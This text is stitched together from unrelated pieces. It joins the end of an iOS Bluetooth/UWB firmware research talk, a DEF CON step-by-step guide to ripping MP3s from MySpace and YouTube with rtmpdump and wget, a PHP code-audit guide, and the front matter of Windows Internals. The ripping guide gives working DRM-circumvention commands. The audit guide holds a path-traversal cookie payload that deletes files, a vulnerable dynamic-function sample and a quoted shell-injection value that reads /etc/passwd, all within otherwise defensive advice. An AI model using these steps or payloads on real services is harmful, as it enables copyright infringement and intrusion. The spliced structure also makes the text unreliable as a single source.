Contained in the
firmware update
image
Signature
Bound to the chip’s ECID
Appended during
update process
Demo: Show the system messages as the chip boots, and possibly an invalid boot
Obtaining Logs
Trigger Rose Error Handling (#1)
case 7:
_os_log_impl( …,
"PRRoseProvider::relayCommandMessage -- SystemOff",
buf_full_packet,
2LL);
…
case 8:
…
"PRRoseProvider::relayCommandMessage -- RefreshConfiguration",
…
PRRoseProvider::relayCommandMessage_RefreshConfiguration_104F70484(a1 + 19);
…
case 9:
…
"PRRoseProvider::relayCommandMessage -- TriggerFatalErrorHandling",
…
log_rose_r1_msg_1021139CC(buf_full_packet, "AOPRoseFatalError");
PRRoseProvider::relayCommandMessage_TriggerFatalErrorHandling_104F72654(…)
…
Can we interact with the firmware without
modifying it?
SystemOff is executed when entering flight
mode, switch this with the implementation of
TriggerFatalErrorHandling.
Get full crash logs and packet logs by setting
isInternalBuild and a few other properties.
Trigger Rose Error Handling (#2)
nearbyd
IOKit
RoseControllerLib
libRoseBooter
Kernel Space
User Space
Mach Messages
Я
RoseControllerLib::TriggerCrashlog(*Controller, 1);
Demo: Show Crash Logs & iOS 13.3 Packet Logs
Conclusion
Lessons Learned
●
Bluetooth and Ultra Wideband are tightly coupled on iOS.
●
Apple’s own RTKit-based wireless chips have an interesting architecture with many
security features like secure boot and ASLR.
●
Many features in the chip can be instrumented from user space.
Q&A
https://github.com/seemoo-lab
Twitter: @naehrdine, @Sn0wfreeze
[jclassen|aheinrich]@seemoo.de
Ripping Media Off of the Wire
A Step-by-Step Guide
By Honey
[email protected]
whoami: Honey is
a Network Administrator for 4+ years
a Research Assistant for a Ballistic research grant by the
NIST
an Adjunct Professor at John Jay College of Criminal
Justice, located in NYC
gaining her Master’s degree in Forensic Computing
has worked in the IT industry for the past 9+ years.
holds a Computer of Information Systems B.S.
dual A.A.S. degrees in Industrial Electronic Engineering
and Computer Networking
Scope: Download MP3s from
Discussion of lack of security of
“protected streaming” implementations
Tools:
wget version 1.11.4 [i]
Mozilla Firefox version 3.6.3 [ii]
an add-on for Mozilla Firefox called “HttpFox”, version 0.8.4 [iii]
rtmpdump version 2.1b for Windows [iv]
“Convert FLV to MP3 version 1.0”
* All tools used are available for use under the GNU
license. Specific versions are cited although may not
be required
Disclosure:
This presentation describes methods to download protected materials in an effort to raise awareness of the various weaknesses that exist within each implementation.
All music/media used in this demonstration has the
appropriate permissions for use by the musical artists
themselves.
Any illegal use of the following methods by third
parties is the sole responsibility of the third party.
The author of this presentation bears no legal responsibility for misuse of said techniques.
Legal Statement:
The following demonstration does violate YouTube‘s terms of
service, MySpace’s terms of service, and the Digital Millennium
Copyright Act, and intellectual property rights, should you
download copyrighted materials.
YOUR USE OF THE INCLUDED TECHNIQUES SHALL BE AT
YOUR OWN RISK.
IN NO EVENT SHALL THE PRESENTER, DEFCON, OR ANY
DEFCON EMPLOYEES, BE LIABLE TO YOU FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, PUNITIVE, OR
CONSEQUENTIAL DAMAGES WHATSOEVER RESULTING
FROM ANY (I) ERRORS, MISTAKES, OR INACCURACIES OF
CONTENT, (II) PERSONAL INJURY OR PROPERTY DAMAGE,
OF ANY NATURE WHATSOEVER, RESULTING FROM YOUR
USE OF THE FOLLOWING TECHNIQUES.
Before We Begin: some thoughts
Not everything is on USENET
Third party plug-ins are not always reliable or kept
current with changes
You got an MD5 sum on that MP3? I didn’t think so!
Third parties could be injecting into your media if you
are trusting them to convert things for you online
**This presentation is not intended to encourage piracy, but is about the dissemination of data/media and the failing security methods for “protected streaming”**
RTMP:
is “Real Time Messaging Protocol” and is a proprietary
protocol developed by Adobe Systems for streaming audio,
video and data over the Internet, between a Flash player
and a server.
The RTMP protocol has three variations:
RTMP itself works on top of TCP and uses port number 1935
RTMPT is encapsulated within HTTP requests to traverse firewalls
RTMPS which is RTMP, but over a secure HTTPS connection.
RTMPE:
is “Encrypted Real Time Messaging Protocol” and
is a proprietary protocol created by Macromedia
used for streaming video and DRM. It supposedly
allows secure transfer of data without SSL. It is
implemented in flash player 9.0.115 and some
versions of Flash Media Server 3.
Taken From Adobe’s Website
“Defend against replay technologies
Replay technologies, or "stream ripping," has been a
difficult security issue to solve because it allows the
viewer to directly access and record the data of a
stream.
Stream encryption prevents stream ripping. In the past,
SSL was the only choice and was too slow for most
applications. With FMS 3, we now have the RTMPE
protocol which is much more efficient and easier
to implement.”
“Flash Media Server communicates with its clients using the Adobe patented,
Real-Time Messaging Protocol (RTMP) over TCP that manages a two-way
connection, allowing the server to send and receive video, audio, and data
between client and server (see Figure 1). In FMS 3, you also have the option to
utilize stronger stream security with encrypted RTMP (RTMPE). RTMPE is easy
to deploy and faster than utilizing SSL for stream encryption. RTMPE is just
one of the robust new security features in FMS 3. (This will be discussed more
in the following sections.)”
Taken from Adobe’s
website, see references.
Adobe Describing DRM:
“Digital rights management
(DRM) has two key elements,
encryption and access control.
There are two ways to deliver
video to a consumer: stream it
Encryption with
Flash Media
Server is done in
real time with
RTMPS (SSL) or
video to a consumer: stream it
or download it. When you
stream video from Flash Media
Server, you immediately
increase your protection.
RTMPS (SSL) or
RTMPE in Flash
Media Server 3.”
Rtmpdump and what it does:
The following text is from the rtmpdump readme:
HTTP gateway: this is an HTTP server that accepts
requests that consist of rtmpdump parameters. It then
connects to the specified RTMP server and returns the
retrieved data in the HTTP response.
all subsequent audio/video data received from the
server will be written to a file, as well as being
delivered back to the client.
Let’s Get This Party Started:
HowTO: Get mp3 files from MySpace
Step One: Install your HttpFox Firefox plugin.
Step Two: Start HttpFox and go to the target MySpace page.
For my example, I will be downloading an MP3 from my favorite Brooklyn-based
band called: “Great Tiger”. When I first discovered these guys, their music was
available ONLY on MySpace. Clearly, I wanted to be able to listen to their great
music if my Internet connection went down or something ☺.
Step Three: Sift through the captured traffic.
Do a search for “getSong”.
Step Four: Click on the "Content" tab at the bottom of HttpFox. Search through
the XML file until you find a URL ending in “mp3”. Copy the URL. This URL is the
actual location of the file hosted on their servers.
Step Five: Download rtmpdump. Here is the fun part: the XML URL contains “rtmp://”, but they are really using rtmpe!
Modify the captured URL.
** You have to replace the leading “rtmp://” with “rtmpe://” and then run the command:
rtmpdump.exe –r [modified captured URL] –o “my.flv”
Notice how I changed the leading rtmp to rtmpe when I issued the command in the command prompt:
Now execute the command and watch the
download start!
Next, watch your download complete! YaY!
Step Six: Convert the “flv” file into an “mp3”.
**If you download the file as an mp3 rather than as a flv file and do not convert it, it has very poor quality. Converting FLV to MP3 resolves this.**
Step Seven: Listen and enjoy your mp3!
Can we see those steps again? How about a quick video? YES.
Let’s Party Hop Onto the Next One:
HowTO: Get mp3 files from YouTube
Step One: Install your HttpFox Firefox Plugin.
Step Two: Start HttpFox and go to the target YouTube video.
For my example, I will be downloading an MP3 from my favorite Brooklyn-based
band called: “Great Tiger”, because I got their permission.
Step Three: Sift through the captured traffic.
Do a search for "get".
Step Four: Copy the URL.
Step Five: Download wget. Modify the URL.
You do not need all of these parameters in the URL.
In fact, if you do not remove the unneeded parameters,
the conversion may fail.
So we want to execute the following command in wget:
wget.exe –O [myfilename.flv] “[captured URL]”
But we need to modify the URL to remove the extra
parameters so our mp3 can be converted properly.
Here is the unedited URL we copied from HttpFox. We
can notice several parameters within the URL.
Here is my example URL:
http://www.youtube.com/get_video?el=detailpage&t=vjVQa1Ppc
FP8KGIOjKHxAqlaFMSePaCwB43kjJjoIPw=&fmt=34&video_id=
p3vg33cvJS0&noflv=1&asv=3
The parameters are:
1) get_video?
2) el=detailpage
3) t=some string of characters
4) fmt=34
5) video_id=some string of characters
6) noflv=1
7) asv=3
****** These parameters are embedded in the URL out of order! (with the exception of the get_video? parameter) ******
All of the parameters are separated by & symbols, except
the very first parameter which comes directly after the
get_video? parameter.
The URL should be in quotes when it is input into wget.
The URL does not need a trailing &.
Ok, so the only parameters we need from the list of 7 are:
1) get_video?
2) t=some string of characters
3) video_id=some string of characters
4) asv=3
Original URL:
http://www.youtube.com/get_video?el=detailpage&t=vjVQa1PpcFP8KGIOjKHxAqlaFMSePaCwB43kjJjoIPw=&fmt=34&video_id=p3vg33cvJS0&noflv=1&asv=3
It does not matter if parameters 2, 3, and 4 are out of order. But they must:
•be separated by an &
•come after the “get_video?” parameter
Modified URL:
http://www.youtube.com/get_video?t=vjVQa1PpcFP8KGIOjKHxAqlaFMSePaCwB43kjJjoIPw=&video_id=p3vg33cvJS0&asv=3
Enter in wget.exe –O [filename.flv] “[modified URL]”
Next, watch your download complete! YaY!
Step Six: Convert your “.flv” file into an “mp3” file.
Step Seven: Listen and enjoy your mp3!
Can we see those steps again? How about in a quick video? YES.
Conclusion:
DRM implementations will almost always fail without
some type of special hardware on the client computer.
Protected Streaming, a DRM technology by Adobe, is supposed to protect digital content from unauthorized use.
Content is encrypted by the Flash Media Server “on the fly,” meaning there is no encryption of the source file. When data is ready for transmission, either RTMPE or RTMPS is used…
RTMPE was designed to be simpler than RTMPS, which requires an SSL certificate. But security is being traded for usability because…
Although the CPU load is lower with RTMPE than with RTMPS on the Flash Media Server, there isn't actually any security.
In January 2009, Adobe attempted to fix the security, but there are still security holes in the design of the RTMPE algorithm itself!
The RTMPE algorithm relies on security through obscurity!!!
RTMPE is vulnerable to Man in the Middle attacks.
Rtmpdump can extract RTMPE streams, and Adobe has issued DMCA takedowns of the tool.
Maybe Adobe should fix its
protocol instead of issuing
DMCA takedowns of tools…
References and Downloads:
[i] Download wget here: http://www.gnu.org/software/wget/
[ii] Download Mozilla Firefox here: http://www.mozilla.com/en-US/
[iii] Download the addon HttpFox here: https://addons.mozilla.org/en-US/firefox/addon/6647/
[iv] Download rtmpdump here: http://rtmpdump.mplayerhq.hu/
[v] ConvertFLVtoMP3: http://www.convertflvtomp3.com
[vi] RTMP: http://www.adobe.com/devnet/rtmp/
[vii] RTMPE: http://lkcl.net/rtmp/RTMPE.txt
[viii] MySpace copyrighted logo is a trademark of MySpace, Inc.
[ix] Great Tiger the band: http://wearegreattiger.com/ and http://www.myspace.com/wearegreattiger
[x] YouTube copyrighted logo is a trademark of Google Inc.
[xi] Adobe’s website content: http://www.adobe.com/devnet/flashmediaserver/articles/overview_streaming_fms3_02.html
Table of Contents
1. Overview
2. Input Validation and Output Display
2.1 Command Injection
2.2 Cross-Site Scripting
2.3 File Inclusion
2.4 Code Injection
2.5 SQL Injection
2.6 XPath Injection
2.7 HTTP Response Splitting
2.8 File Management
2.9 File Upload
2.10 Variable Overwriting
2.11 Dynamic Functions
3. Session Security
3.1 HTTPOnly Setting
3.2 domain Setting
3.3 path Setting
3.4 Cookie Lifetime
3.5 secure Setting
3.6 Session Fixation
3.7 CSRF
4. Encryption
4.1 Passwords Stored in Plaintext
4.2 Weak Password Encryption
4.3 Passwords Stored in Files Accessible to Attackers
5. Authentication and Authorization
5.1 User Authentication
5.2 Unauthenticated Calls to Functions or Files
5.3 Hard-Coded Passwords
6. Random Functions
6.1 rand()
6.2 mt_srand() and mt_rand()
7. Special Characters and Multibyte Encodings
7.1 Multibyte Encodings
8. Dangerous PHP Functions
8.1 Buffer Overflows
8.2 session_destroy() File Deletion Vulnerability
8.3 unset()/zend_hash_del_key_or_index Vulnerability
9. Information Disclosure
9.1 phpinfo
10. PHP Environment
10.1 open_basedir Setting
10.2 allow_url_fopen Setting
10.3 allow_url_include Setting
10.4 safe_mode_exec_dir Setting
10.5 magic_quote_gpc Setting
10.6 register_globals Setting
10.7 safe_mode Setting
10.8 session.use_trans_sid Setting
10.9 display_errors Setting
10.10 expose_php Setting
1. Overview
Code auditing is the systematic review of an application's source code. Its goal is to find and fix vulnerabilities or logic errors introduced during development, so that program flaws cannot be exploited and expose the business to unnecessary risk.
Code auditing is not simply reading code. The reason to audit is to ensure the code adequately protects information and resources, so familiarity with the application's entire business flow is essential to controlling potential risk. Auditors can interview developers with questions like the following to gather information about the application:
What kinds of sensitive information does the application hold, and how does it protect that information?
Does the application serve internal or external users? Who will use it, and are they trusted users?
Where is the application deployed?
How important is the application to the business?
The best approach is to prepare a checklist for developers to fill out. A checklist gives a direct view of the application's characteristics and the secure-coding work done by developers. It should cover the modules where serious vulnerabilities may exist, for example: data validation, authentication, session management, authorization, encryption, error handling, logging, security configuration, and network architecture.
2. Input Validation and Output Display
Most vulnerabilities arise because input data is not securely validated or output data is not securely handled. The stricter data-validation approaches are:
Match the data exactly
Accept whitelisted data
Reject blacklisted data
Encode data that matches the blacklist
In PHP, the variables that can carry user input are listed below:
$_SERVER
$_GET
$_POST
$_COOKIE
$_REQUEST
$_FILES
$_ENV
$_HTTP_COOKIE_VARS
$_HTTP_ENV_VARS
$_HTTP_GET_VARS
$_HTTP_POST_FILES
$_HTTP_POST_VARS
$_HTTP_SERVER_VARS
We should check each of these input variables.
2.1 Command Injection
PHP can execute system commands through the following functions: system, exec, passthru, `` (backticks), shell_exec, popen, proc_open, pcntl_exec.
Search all program files for these functions, determine whether their arguments can be changed by external input, and check whether those arguments are safely handled.
Countermeasures:
Use custom functions or function libraries instead of external commands
Use the escapeshellarg function to handle command arguments
Use safe_mode_exec_dir to specify the path of executable files
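As a sketch of the second countermeasure, a hypothetical lookup script (the `host` parameter and the ping command are invented for this example) might pass user input through escapeshellarg before building the command line:

```php
<?php
// Hypothetical example: ping a user-supplied host.
// Without escapeshellarg, input such as "127.0.0.1; cat /etc/passwd"
// would be interpreted by the shell as a second command.
$host = $_GET['host'] ?? '127.0.0.1';

// escapeshellarg() wraps the value in single quotes and escapes any
// embedded quotes, so the shell sees exactly one argument.
$cmd = 'ping -c 1 ' . escapeshellarg($host);
$output = shell_exec($cmd);

// Encode before echoing, so the command output cannot inject HTML.
echo htmlspecialchars((string) $output, ENT_QUOTES, 'UTF-8');
```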
2.2 Cross-Site Scripting
Reflected XSS typically occurs when a user-submitted variable is received, processed, and output directly to the client. Stored XSS typically occurs when a user-submitted variable is received, processed, and stored in the database, then later read back and output to the client. Output commonly goes through: echo, print, printf, vprintf, <%=$test%>.
For reflected XSS, because output is displayed to the client immediately, check in the current PHP page whether the variable is displayed right after the client submits it, and whether it passes any security check in the process.
For stored XSS, check whether the variable passes a security check on the path from input to storage and back out to display.
Countermeasures:
If the input should contain only letters and digits, block any special character
Strictly match input data against its expected format, e.g., email format, or usernames containing only English or Chinese characters, underscores, and hyphens
HTML-encode the output. Encoding rules:
< &lt;
> &gt;
( &#40;
) &#41;
# &#35;
& &amp;
" &quot;
' &#39;
` %60
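A minimal sketch of the output-encoding countermeasure using PHP's built-in htmlspecialchars (the helper name safe_echo is invented for the example):

```php
<?php
// Encode a user-supplied value before echoing it into HTML.
// ENT_QUOTES encodes both double and single quotes, covering
// attribute contexts as well as element content.
function safe_echo(string $value): void
{
    echo htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// A classic reflected-XSS probe is neutralized:
safe_echo('<script>alert(1)</script>');
// Output: &lt;script&gt;alert(1)&lt;/script&gt;
```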
2.3 File Inclusion
PHP functions that can lead to file inclusion: include, include_once, require, require_once, show_source, highlight_file, readfile, file_get_contents, fopen, file.
Countermeasures:
Match input data exactly. For example, if the variable's value selects a language file such as en.php or cn.php in the same directory ('language/'.$_POST['lang'].'.php'), then checking that the submitted value is exactly en or cn is the strictest approach; checking that it contains only letters is also good
Filter characters such as / and .. out of the parameter
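The exact-match countermeasure can be sketched as follows, reusing the language-file layout from the example above (the fallback-to-default behavior is an assumption):

```php
<?php
// Whitelist of language files that are allowed to be included.
$allowed = ['en', 'cn'];

$lang = $_POST['lang'] ?? 'en';

// Exact match against the whitelist -- anything else falls back to
// the default instead of ever reaching include().
if (!in_array($lang, $allowed, true)) {
    $lang = 'en';
}

$file = 'language/' . $lang . '.php';
if (is_file($file)) {
    include $file;
}
```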
2.4 Code Injection
PHP functions that can lead to code injection: eval, preg_replace with the /e modifier, assert, call_user_func, call_user_func_array, create_function.
Find the places where the program uses these functions, and check whether the submitted variables are user-controllable and whether input validation is performed.
Countermeasures:
Match input data exactly
Whitelist the functions that may be executed
2.5 SQL Injection
Because SQL injection involves database operations, the usual approach is to search for SQL keywords: insert, delete, update, select, then check whether the variables passed in are user-controllable and whether they are safely handled.
Countermeasure:
Use parameterized queries
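A hedged sketch of a parameterized query with PDO; the table, column, and in-memory SQLite database are invented stand-ins for the real application's schema:

```php
<?php
// Parameterized query: the user-supplied value is bound as data,
// never concatenated into the SQL text.
$pdo = new PDO('sqlite::memory:');
$pdo->exec('CREATE TABLE users (id INTEGER, name TEXT)');
$pdo->exec("INSERT INTO users VALUES (1, 'alice')");

$name = "alice' OR '1'='1"; // classic injection attempt

$stmt = $pdo->prepare('SELECT id FROM users WHERE name = ?');
$stmt->execute([$name]);

// The injection string matches no row, because it was treated as a
// literal value rather than as SQL.
print_r($stmt->fetchAll()); // prints an empty array
```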
2.6 XPath Injection
XPath is used to query XML. Search for xpath and check whether the arguments passed to XPath functions are safely handled.
Countermeasure:
Match the data exactly
2.7 HTTP Response Splitting
In PHP, HTTP response splitting can occur when using the header function or the $_SERVER variable. Note that recent PHP versions forbid newline characters in HTTP headers; in that case this test can simply be skipped.
Countermeasures:
Match input data exactly
Reject any input containing \r or \n
2.8 File Management
If the input variables of PHP's file-management functions can be submitted by users and the program performs no data validation, they can become high-risk vulnerabilities. Search the program for the following functions: copy, rmdir, unlink, delete, fwrite, chmod, fgetc, fgetcsv, fgets, fgetss, file, file_get_contents, fread, readfile, ftruncate, file_put_contents, fputcsv, fputs. In practice, every file-operation function in PHP can be dangerous.
http://ir.php.net/manual/en/ref.filesystem.php
Countermeasures:
Strictly match submitted data
Restrict the directories in which files can be operated on
2.9 File Upload
PHP file uploads usually go through move_uploaded_file; you can also find the upload code and analyze it specifically.
Countermeasures:
Check the file extension against a whitelist
After upload, generate the stored file name with a time-based algorithm
Make script files in the upload directory non-executable
Watch out for %00 truncation
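The first two countermeasures might be sketched like this (the helper name, field name, and upload directory are invented; the move_uploaded_file call is left commented out since it only works for a real upload request):

```php
<?php
// Whitelist of extensions that may be stored.
$allowed = ['jpg', 'png', 'gif'];

function safe_upload_name(string $original, array $allowed): ?string
{
    // Extract the extension and compare it against the whitelist.
    $ext = strtolower(pathinfo($original, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return null; // reject anything not whitelisted
    }
    // Generate the stored name from the current time plus randomness,
    // discarding the user-supplied base name entirely.
    return date('YmdHis') . '_' . bin2hex(random_bytes(4)) . '.' . $ext;
}

// In a real handler, something like:
// move_uploaded_file($_FILES['upfile']['tmp_name'],
//     '/uploads/' . safe_upload_name($_FILES['upfile']['name'], $allowed));
```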
2.10 Variable Overwriting
Variable overwriting in PHP occurs in the following situations:
Initializing variables in a loop, for example:
foreach ($_GET as $key => $value)
    $$key = $value;
Functions that overwrite variables: parse_str, mb_parse_str, import_request_variables
When register_globals=ON, variables submitted via GET directly overwrite globals
Countermeasures:
Set register_globals=OFF
Do not use these functions to obtain variables
2.11 Dynamic Functions
When dynamic functions are used and the user can control the variable, an attacker can execute arbitrary functions.
Example:
<?php
$myfunc = $_GET['myfunc'];
$myfunc();
?>
Countermeasure:
Do not use functions this way
3. Session Security
3.1 HTTPOnly Setting
When session.cookie_httponly = ON, client-side scripts (JavaScript and the like) cannot access the cookie. Enabling this directive effectively prevents session-ID hijacking via XSS attacks.
3.2 domain Setting
Check whether session.cookie_domain contains only the current domain. If it is a parent domain, other subdomains can read this domain's cookies.
3.3 path Setting
Check session.cookie_path. If the application itself lives under /app, the path must be set to /app/ to be safe.
3.4 Cookie Lifetime
Check session.cookie_lifetime. If the lifetime is set too long, an attacker can still compromise the account even after the user closes the browser.
3.5 secure Setting
If HTTPS is in use, set session.cookie_secure=ON to ensure cookies are transmitted only over HTTPS.
3.6 Session Fixation
When the privilege level changes (for example, an ordinary user is promoted to administrator after the username and password are verified), the session ID should be regenerated; otherwise the program is exposed to session-fixation attacks.
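A minimal sketch of regenerating the session ID at the moment of privilege change; check_credentials and its hard-coded values are hypothetical stand-ins for the application's real login check:

```php
<?php
session_start();

// Hypothetical credential check -- stands in for the real one.
function check_credentials(string $user, string $pass): bool
{
    // hash_equals compares in constant time, resisting timing attacks.
    return $user === 'admin' && hash_equals('secret', $pass);
}

if (check_credentials($_POST['user'] ?? '', $_POST['pass'] ?? '')) {
    // Privilege level is about to change: discard the old session ID
    // so a fixated ID supplied by an attacker becomes worthless.
    session_regenerate_id(true); // true = delete the old session data
    $_SESSION['role'] = 'admin';
}
```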
3.7 CSRF
In a cross-site request forgery attack, the attacker forges a malicious request link and, through various means, gets a legitimate user to visit it, so that the malicious requests execute with the user's identity. We should review the more important program modules, such as changing a user's password or adding a user, and check whether a one-time token is used to defend against CSRF attacks.
4. Encryption
4.1 Passwords Stored in Plaintext
Storing passwords in plaintext seriously threatens user, application, and system security.
4.2 Weak Password Encryption
Using an easily cracked algorithm: MD5 hashes, for example, can already be partly cracked using online MD5-cracking sites.
4.3 Passwords Stored in Files Accessible to Attackers
For example: saving passwords in txt, ini, conf, inc, or xml files, or writing them directly into HTML comments.
5. Authentication and Authorization
5.1 User Authentication
Check the places in the code where users are authenticated and whether the authentication can be bypassed; for example, the login code may be vulnerable to form injection. Check whether the login code uses a CAPTCHA or other means of preventing brute forcing.
5.2 Unauthenticated Calls to Functions or Files
Some admin pages should be off-limits to ordinary users, but developers sometimes forget to check permissions on these files, leading to vulnerabilities.
Some pages invoke functionality via parameters without permission checks, for example index.php?action=upload
5.3 Hard-Coded Passwords
Some programs write the database account and password directly into the database-connection function.
6. Random Functions
6.1 rand()
rand()'s maximum random number is 32767. When rand is used to generate session values, an attacker can easily crack the session; mt_rand() is recommended instead.
6.2 mt_srand() and mt_rand()
In PHP 4 and PHP 5 before 5.2.6, these two functions handle data insecurely. Many web applications use mt_rand for random session values, for example in password-recovery features; the consequence is that attackers can exploit this to reset passwords directly.
7. Special Characters and Multibyte Encodings
7.1 Multibyte Encodings
8. Dangerous PHP Functions
8.1 Buffer Overflows
confirm_phpdoc_compiled
Affected versions:
phpDocumentor 1.3.1
phpDocumentor 1.3 RC4
phpDocumentor 1.3 RC3
phpDocumentor 1.2.3
phpDocumentor 1.2.2
phpDocumentor 1.2.1
phpDocumentor 1.2
mssql_pconnect/mssql_connect
Affected versions: PHP <= 4.4.6
crack_opendict
Affected versions: PHP = 4.4.6
snmpget
Affected versions: PHP <= 5.2.3
ibase_connect
Affected versions: PHP = 4.4.6
unserialize
Affected versions: PHP 5.0.2, PHP 5.0.1, PHP 5.0.0, PHP 4.3.9, PHP 4.3.8, PHP 4.3.7, PHP 4.3.6, PHP 4.3.3, PHP 4.3.2, PHP 4.3.1, PHP 4.3.0, PHP 4.2.3, PHP 4.2.2, PHP 4.2.1, PHP 4.2.0, PHP 4.2-dev, PHP 4.1.2, PHP 4.1.1, PHP 4.1.0, PHP 4.1, PHP 4.0.7, PHP 4.0.6, PHP 4.0.5, PHP 4.0.4, PHP 4.0.3pl1, PHP 4.0.3, PHP 4.0.2, PHP 4.0.1pl2, PHP 4.0.1pl1, PHP 4.0.1
8.2 session_destroy() File Deletion Vulnerability
Affected versions: unknown; needs specific testing.
Test code:
<?php
session_save_path('./');
session_start();
if ($_GET['del']) {
    session_unset();
    session_destroy();
} else {
    $_SESSION['do'] = 1;
    echo(session_id());
    print_r($_SESSION);
}
?>
When we submit the cookie PHPSESSIONID=/../1.php, it is equivalent to deleting that file.
8.3 unset()/zend_hash_del_key_or_index Vulnerability
In PHP 4 before 4.4.3 and PHP 5 before 5.1.3, zend_hash_del_key_or_index can cause zend_hash_del to delete the wrong element. When PHP's unset() function is called, this can prevent the variable from actually being unset.
9. Information Disclosure
9.1 phpinfo
If an attacker can browse to the environment information displayed by a phpinfo call in the program, it provides convenience for further attacks.
10. PHP Environment
10.1 open_basedir Setting
open_basedir restricts the directories the application can access. Check whether open_basedir is set. It can also be set through the web server, for example Apache's php_admin_value, or nginx+fcgi controlling the PHP settings through its conf.
10.2 allow_url_fopen Setting
If allow_url_fopen=ON, PHP can read and operate on remote files, which is easily abused by attackers.
10.3 allow_url_include Setting
If allow_url_include=ON, PHP can include remote files, leading to serious vulnerabilities.
10.4 safe_mode_exec_dir Setting
This option controls the directory of external commands PHP may invoke. If the PHP program calls external commands, specifying the directory of those commands contains the program's risk.
10.5 magic_quote_gpc Setting
This option escapes special characters in submitted parameters; setting magic_quote_gpc=ON is recommended.
10.6 register_globals Setting
Enabling this option makes PHP register all externally submitted variables as globals, with serious consequences.
10.7 safe_mode Setting
safe_mode is an important PHP security feature; enabling it is recommended.
10.8 session.use_trans_sid Setting
If session.use_trans_sid is enabled, PHP passes the session ID via the URL, making it easier for an attacker to hijack the current session or trick users into using an existing session already controlled by the attacker.
10.9 display_errors Setting
If this option is enabled, PHP outputs all error and warning messages, which attackers can use to obtain sensitive information such as the web root path.
10.10 expose_php Setting
If expose_php is enabled, every response generated by the PHP interpreter includes the PHP version installed on the host system. Knowing the PHP version running on a remote server, an attacker can enumerate known exploits against the system, greatly increasing the chance of a successful attack.
References:
https://www.fortify.com/vulncat/zh_CN/vulncat/index.html
http://secinn.appspot.com/pstzine/read?issue=3&articleid=6
http://riusksk.blogbus.com/logs/51538334.html
http://www.owasp.org/index.php/Category:OWASP_Code_Review_Project
Windows Internals
Seventh Edition
Part 2
Andrea Allievi
Alex Ionescu
Mark E. Russinovich
David A. Solomon
Editor-in-Chief: Brett Bartow
Development Editor: Mark Renfrow
Managing Editor: Sandra Schroeder
Senior Project Editor: Tracey Croom
Executive Editor: Loretta Yates
Production Editor: Dan Foster
Copy Editor: Charlotte Kughen
Indexer: Valerie Haynes Perry
Proofreader: Dan Foster
Technical Editor: Christophe Nasarre
Editorial Assistant: Cindy Teeters
Cover Designer: Twist Creative, Seattle
Compositor: Danielle Foster
Graphics: Vived Graphics
WINDOWS INTERNALS, SEVENTH EDITION, PART 2
Published with the authorization of Microsoft Corporation by:
Pearson Education, Inc.
Copyright © 2022 by Pearson Education, Inc.
All rights reserved. This publication is protected by copyright, and permission
must be obtained from the publisher prior to any prohibited reproduction,
storage in a retrieval system, or transmission in any form or by any means,
electronic, mechanical, photocopying, recording, or likewise. For information
regarding permissions, request forms, and the appropriate contacts within
the Pearson Education Global Rights & Permissions Department, please visit
www.pearson.com/permissions.
No patent liability is assumed with respect to the use of the information con-
tained herein. Although every precaution has been taken in the preparation
of this book, the publisher and author assume no responsibility for errors or
omissions. Nor is any liability assumed for damages resulting from the use of
the information contained herein.
ISBN-13: 978-0-13-546240-9
ISBN-10: 0-13-546240-1
Library of Congress Control Number: 2021939878
TRADEMARKS
Microsoft and the trademarks listed at http://www.microsoft.com on the
“Trademarks” webpage are trademarks of the Microsoft group of companies.
All other marks are property of their respective owners.
WARNING AND DISCLAIMER
Every effort has been made to make this book as complete and as accurate as possible, but no warranty or fitness is implied. The information provided is
on an “as is” basis. The author, the publisher, and Microsoft Corporation shall
have neither liability nor responsibility to any person or entity with respect to
any loss or damages arising from the information contained in this book or
from the use of the programs accompanying it.
SPECIAL SALES
For information about buying this title in bulk quantities, or for special sales
opportunities (which may include electronic versions; custom cover designs;
and content particular to your business, training goals, marketing focus, or
branding interests), please contact our corporate sales department at
[email protected] or (800) 382-3419.
For government sales inquiries,
please contact [email protected].
For questions about sales outside the U.S.,
please contact [email protected].
To my parents, Gabriella and Danilo, and to my brother,
Luca, who all always believed in me and pushed me in following
my dreams.
—ANDREA ALLIEVI
To my wife and daughter, who never give up on me and are a
constant source of love and warmth. To my parents, for inspiring
me to chase my dreams and making the sacrifices that gave me
opportunities.
—ALEX IONESCU
Contents at a Glance
About the Authors
xviii
Foreword
xx
Introduction
xxiii
CHAPTER 8
System mechanisms
1
CHAPTER 9
Virtualization technologies
267
CHAPTER 10
Management, diagnostics, and tracing
391
CHAPTER 11
Caching and file systems
CHAPTER 12
Startup and shutdown
777
Contents of Windows Internals, Seventh Edition, Part 1
851
Index
861
vii
Contents
About the Authors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xviii
Foreword . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .xx
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xxiii
Chapter 8
System mechanisms
1
Processor execution model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Segmentation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Task state segments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6
Hardware side-channel vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Out-of-order execution . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
The CPU branch predictor . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .11
The CPU cache(s) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12
Side-channel attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13
Side-channel mitigations in Windows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
KVA Shadow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18
Hardware indirect branch controls (IBRS, IBPB, STIBP, SSBD) . . . . . . . 21
Retpoline and import optimization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .23
STIBP pairing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .26
